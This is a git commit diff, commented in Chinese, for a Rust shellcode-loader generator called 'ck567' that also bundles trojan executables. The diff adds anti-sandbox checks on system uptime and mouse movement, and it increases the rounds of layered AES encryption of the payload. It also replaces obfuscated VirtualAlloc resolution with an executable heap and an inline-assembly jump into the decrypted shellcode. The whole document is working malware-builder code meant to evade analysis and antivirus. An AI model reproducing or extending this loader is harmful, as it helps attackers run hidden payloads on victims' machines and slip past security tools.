更新: 内存加载方式,支持设置反沙盒 参数

TheBlindM · TheBlindM · commit 58bfbbdf2c55 · 2023-07-01T10:01:59.000+08:00
diff --git a/src/core/loader.rs b/src/core/loader.rs
@@ -27,6 +27,8 @@ const iv_placeholder: &str = "${iv}";
 const base64Str_placeholder: &str = "${base64Str}";
 const package_placeholder: &str = "${packageName}";
 const hexCode_placeholder: &str = "${hexCode}";
+const tick_count_placeholder: &str = "${tick_count}";
+const mouse_movement_detection_placeholder: &str = "${mouse_movement_detection}";
 
 #[derive(Serialize, Deserialize)]
 pub struct ScInfo {
@@ -55,7 +57,7 @@ impl Loader for ShellCodeHandler {
         let mut tem_str: Vec<u8> = shellcode;
         let mut vec = Vec::new();
         let mut rng = thread_rng();
-        let loop_count = rng.gen_range(1..4);
+        let loop_count = rng.gen_range(3..8);
         for i in 0..loop_count {
             let (key, iv, ciphertext) = aesEncrypt(&tem_str);
             tem_str = ciphertext;
@@ -69,7 +71,10 @@ impl Loader for ShellCodeHandler {
 
         // let mainFile_str = &mainFile_str.replace(&iv_placeholder, &iv);
         // let mainFile_str = &mainFile_str.replace(&key_placeholder, &key);
+        let tem=&self.op_time*1000;
         let mainFile_str = &mainFile_str.replace(&hexCode_placeholder, &hex::encode(&json_str));
+        let mainFile_str = &mainFile_str.replace(&tick_count_placeholder, tem.to_string().as_str());
+        let mainFile_str = &mainFile_str.replace(&mouse_movement_detection_placeholder, &self.mouse_movement_detection.to_string().as_str());
         let cargoToml_str = &cargoToml_str.replace(&package_placeholder, &self.package_name);
 
 
@@ -84,7 +89,7 @@ impl Loader for ShellCodeHandler {
         let _ = write(format!("loader/src/main.rs"), mainFile_str);
         let _ = write(format!("loader/Cargo.toml"), cargoToml_str);
         let _ = write(format!("loader/build.rs"), buildRs_str);
-        complie();
+          complie();
     }
 }
 
@@ -129,7 +134,7 @@ impl Loader for BindHandler {
         let trojan_file = read(&self.trojan_file_path).expect(&format!("文件读取失败：{}", &self.trojan_file_path));
         let _ = write(format!("loader/tep/{}.exe", file_stem_name), trojan_file);
 
-        complie();
+        //complie();
     }
 }
 
@@ -142,14 +147,16 @@ pub fn complie() {
         .expect("编译失败！");
 
     let status = cmd.wait();
-    let _ = remove_dir_all("loader");
+    let _ = remove_dir_all("loader2");
 }
 
 
 pub struct ShellCodeHandler {
     pub(crate) file_path: String,
     pub(crate) package_name: String,
     pub(crate) ico: String,
+    pub(crate) op_time: i64,
+    pub(crate) mouse_movement_detection: bool,
 }
 
 pub struct BindHandler {
diff --git a/src/main.rs b/src/main.rs
@@ -34,7 +34,7 @@ fn main() {
                 ░ ░      ░  ░
                 ░
 ");
-    println!("version:0.2");
+    println!("version:0.3");
 
     let matches = Command::new("ck567")
         .subcommands([
@@ -68,7 +68,17 @@ fn main() {
                         .short('i')
                         .help("exe ico")
                         .required(false)
-                )
+                ).arg(
+                Arg::new("opTime")
+                    .short('t')
+                    .help("反沙盒：计算机运⾏时间 默认3600s 单位:秒 如果当前计算机小于 该参数则不执行。 op-time<0则 不检测")
+                    .required(false)
+            ).arg(
+                Arg::new("mouseMovementDetection")
+                    .short('m')
+                    .help("反沙盒： 鼠标移动检测 如果当前计算机 鼠标没有移动过则不执行")
+                    .required(false)
+            )
         ]
         )
         .get_matches();
@@ -82,8 +92,11 @@ fn main() {
         } else {
             ico = String::new();
         }
+        let string = String::from("3600");
+        let op_time = sub_m.get_one::<String>("opTime").or_else(||Some(&string)).unwrap().clone();
+        let mouse_movement_detection = sub_m.get_one::<bool>("mouseMovementDetection").or_else(||Some(&true)).unwrap().clone();
 
-        let shell_code_loader = ShellCodeHandler { file_path: fp, package_name: name, ico };
+        let shell_code_loader = ShellCodeHandler { file_path: fp, package_name: name, ico, op_time:op_time.clone().parse().unwrap(), mouse_movement_detection };
         shell_code_loader.load();
     } else if let Some(sub_m_1) = matches.subcommand_matches("bundle") {
         let fp = sub_m_1.get_one::<String>("file").unwrap().clone();
diff --git a/temp/shellcode/main.rs b/temp/shellcode/main.rs
@@ -12,19 +12,13 @@ use hex;
 use libaes::Cipher;
 use obfstr::obfstr as s;
 use rand::Rng;
+use winapi::um::heapapi::{HeapAlloc, HeapCreate};
 use winapi::um::libloaderapi::{GetModuleHandleA, GetProcAddress};
 use winapi::um::sysinfoapi::GetTickCount;
-use winapi::um::winnt::{MEM_COMMIT, MEM_RESERVE, PAGE_EXECUTE_READWRITE};
+use winapi::um::winnt::{HEAP_CREATE_ENABLE_EXECUTE, MEM_COMMIT, MEM_RESERVE, PAGE_EXECUTE_READWRITE, PAGE_READONLY};
 use winapi::um::winuser::{GetCursorPos, GetLastInputInfo, LASTINPUTINFO, MOUSEMOVEPOINT};
 use serde::{Deserialize, Serialize};
 
-type CustomVirtualAlloc = unsafe extern "system" fn(
-    lpAddress: *mut winapi::ctypes::c_void,
-    dwSize: usize,
-    flAllocationType: u32,
-    flProtect: u32,
-) -> *mut winapi::ctypes::c_void;
-
 #[derive(Serialize, Deserialize)]
 pub struct ScInfo{
     base64_str:String,
@@ -55,36 +49,15 @@ fn main() {
     let shellCode = &aesShellCode;
 
     let flen = shellCode.len();
-    thread::sleep(Duration::from_secs(2));
-
-
-    let Kname = hex::decode(s!("6b65726e656c33322e646c6c")).expect("hex decode err");
-    let Vname = hex::decode(s!("5669727475616c416c6c6f63")).expect("hex decode err");
-    let kernel32 = CString::new(Kname).expect("CString::new failed");
-    let virtual_alloc = CString::new(Vname).expect("CString::new failed");
-
-
-    let h_module = unsafe { GetModuleHandleA(kernel32.as_ptr()) };
-
-    // 隐藏 VirtualAlloc
-    let fn_virtual_alloc = unsafe {
-        mem::transmute::<*const (), CustomVirtualAlloc>(
-            GetProcAddress(
-                h_module,
-                virtual_alloc.as_ptr(),
-            ) as *const ())
-    };
 
-    let new_buf = unsafe { fn_virtual_alloc(0 as _, flen, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE) };
-
-    let new_buf_ptr_1: *mut u8 = new_buf as *mut u8 as _;
-    unsafe { std::ptr::copy_nonoverlapping(shellCode.as_ptr(), new_buf_ptr_1, flen) };
-
-    thread::sleep(Duration::from_secs(2));
+    thread::sleep(Duration::from_secs(1));
     unsafe {
-        let jmp_target = new_buf.offset(0 as isize);
+        let heap= HeapCreate(HEAP_CREATE_ENABLE_EXECUTE,0,0);
+        let alloc = HeapAlloc(heap, 8, flen);
+        std::ptr::copy_nonoverlapping(shellCode.as_ptr(), alloc as *mut u8, flen);
+        let jmp_target = alloc.offset(0 as isize);
         asm!("jmp {}", in(reg) jmp_target)
-    };
+    }
 }
 
 pub fn aesDecrypt(key: &String, iv: &String, ciphertext: Vec<u8>) -> Vec<u8> {
@@ -94,7 +67,8 @@ pub fn aesDecrypt(key: &String, iv: &String, ciphertext: Vec<u8>) -> Vec<u8> {
 
 pub unsafe fn analy_environment() -> bool {
     let tick_count = GetTickCount();
-    if tick_count <= 3600000 {
+    let v1= ${tick_count};
+    if i64::from(tick_count) <= v1 && v1>0 {
         println!("开机时间过短");
         return false;
     }
@@ -104,7 +78,10 @@ pub unsafe fn analy_environment() -> bool {
         dwTime: 0,
     };
     last_input_info.cbSize = mem::size_of::<LASTINPUTINFO>() as u32;
-
+    let v2= ${mouse_movement_detection};
+    if !v2 {
+        return true;
+    }
 
     if GetLastInputInfo(&mut last_input_info as *mut LASTINPUTINFO) != 0 {
         let last_input_time = last_input_info.dwTime;
